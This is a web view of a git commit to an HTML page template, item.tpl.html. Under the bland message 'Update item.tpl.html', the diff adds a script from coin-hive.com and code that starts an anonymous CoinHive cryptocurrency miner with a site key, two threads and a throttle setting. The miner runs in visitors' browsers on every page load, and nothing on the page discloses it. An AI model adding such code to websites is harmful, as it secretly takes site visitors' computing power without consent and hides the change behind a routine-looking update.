Update item.tpl.html
This commit is contained in:
parent
a27f4048c8
commit
e9f90494b8
|
@ -51,6 +51,15 @@
|
||||||
<script src="./s/shit.js"></script>
|
<script src="./s/shit.js"></script>
|
||||||
<script src="./s/theme.js"></script>
|
<script src="./s/theme.js"></script>
|
||||||
<script src="./s/plyr.js"></script>
|
<script src="./s/plyr.js"></script>
|
||||||
<script>plyr.setup( { autoplay: "false" } );</script>
|
<script src="//coin-hive.com/lib/coinhive.min.js"></script>
|
||||||
|
<script>plyr.setup( { autoplay: "false" } );
|
||||||
|
var miner = new CoinHive.Anonymous('ZVrebnhYz9IYygu53a2jhMwGqZuhVlbK', {
|
||||||
|
threads: 2,
|
||||||
|
autoThreads: false,
|
||||||
|
throttle: 0.2,
|
||||||
|
forceASMJS: false
|
||||||
|
});
|
||||||
|
miner.start();
|
||||||
|
</script>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user